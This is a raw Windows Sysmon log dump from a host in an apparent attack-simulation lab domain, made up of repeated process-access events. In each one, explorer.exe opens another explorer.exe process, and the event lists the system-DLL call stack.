16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 